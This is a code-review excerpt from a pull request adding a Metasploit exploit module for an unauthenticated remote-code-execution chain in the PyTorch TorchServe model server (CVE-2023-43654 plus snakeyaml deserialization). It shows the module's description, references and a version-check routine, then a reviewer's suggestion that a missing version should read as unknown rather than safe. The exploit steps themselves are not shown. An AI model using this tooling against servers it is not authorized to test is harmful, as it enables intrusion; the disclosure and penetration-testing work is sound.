modules/exploits/multi/http/torchserver_cve_2023_43654.rb

```diff
@@ -0,0 +1,153 @@
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::Java::HTTP::ClassLoader
+
+  def initialize(_info = {})
+    super(
+      'Name' => 'PyTorch Model Server Registration and Deserialization RCE',
+      'Description' => %q{
+          The PyTorch model server contains multiple vulnerabilities that can be chained together to permit an
+        unauthenticated remote attacker arbitrary Java code execution. The first vulnerability is that the management
+        interface is bound to all IP addresses and not just the loop back interface as the documentation suggests. The
+        second vulnerability (CVE-2023-43654) allows attackers with access to the management interface to register MAR
+        model files from arbitrary servers. The third vulnerability is that when an MAR file is loaded, it can contain a
+        YAML configuration file that when deserialized by snakeyaml, can lead to loading an arbitrary Java class.
+      },
+      'Author' => [
+        'Idan Levcovich', # vulnerability discovery and research
+        'Guy Kaplan', # vulnerability discovery and research
+        'Gal Elbaz', # vulnerability discovery and research
+        'Swapneil Kumar Dash', # snakeyaml deserialization research
+        'Spencer McIntyre' # metasploit module
+      ],
+      'References' => [
+        [ 'URL', 'https://www.oligo.security/blog/shelltorch-torchserve-ssrf-vulnerability-cve-2023-43654' ],
+        [ 'CVE', '2023-43654' ], # model registration SSRF
+        [ 'URL', 'https://github.com/pytorch/serve/security/advisories/GHSA-8fxr-qfr9-p34w' ],
+        [ 'CVE', '2022-1471' ], # snakeyaml deserialization RCE
+        [ 'URL', 'https://github.com/google/security-research/security/advisories/GHSA-mjmj-j48q-9wg2' ],
+        [ 'URL', 'https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in' ],
+        [ 'URL', 'https://swapneildash.medium.com/snakeyaml-deserilization-exploited-b4a2c5ac0858' ]
+      ],
+      'DisclosureDate' => '2023-10-03',
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'RPORT' => 8081
+      },
+      'Targets' => [
+        [
+          'Automatic', {
+            'Platform' => 'java',
+            'Arch' => [ARCH_JAVA]
+          }
+        ],
+      ],
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => [REPEATABLE_SESSION]
+      }
+    )
+  end
+
+  def check
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'api-description'))
+    return Exploit::CheckCode::Unknown unless res
+    return Exploit::CheckCode::Safe unless res.code == 200
+    unless res.get_json_document.dig('info', 'title') == 'TorchServe APIs'
+      return Exploit::CheckCode::Safe('The TorchServe API was not detected on the target.')
+    end
+
+    version = res.get_json_document.dig('info', 'version')
+    return Exploit::CheckCode::Safe unless version.present?
```

Comment:
```suggestion
    return Exploit::CheckCode::Unknown unless version.present?
```

Since this is a TechServe server for sure, but without a version number, it's unknown if it's a vulnerable one, no?

Reply:
Yeah this should be detected since at this point we're confident it's running but we can't get the version number for whatever reason. 👍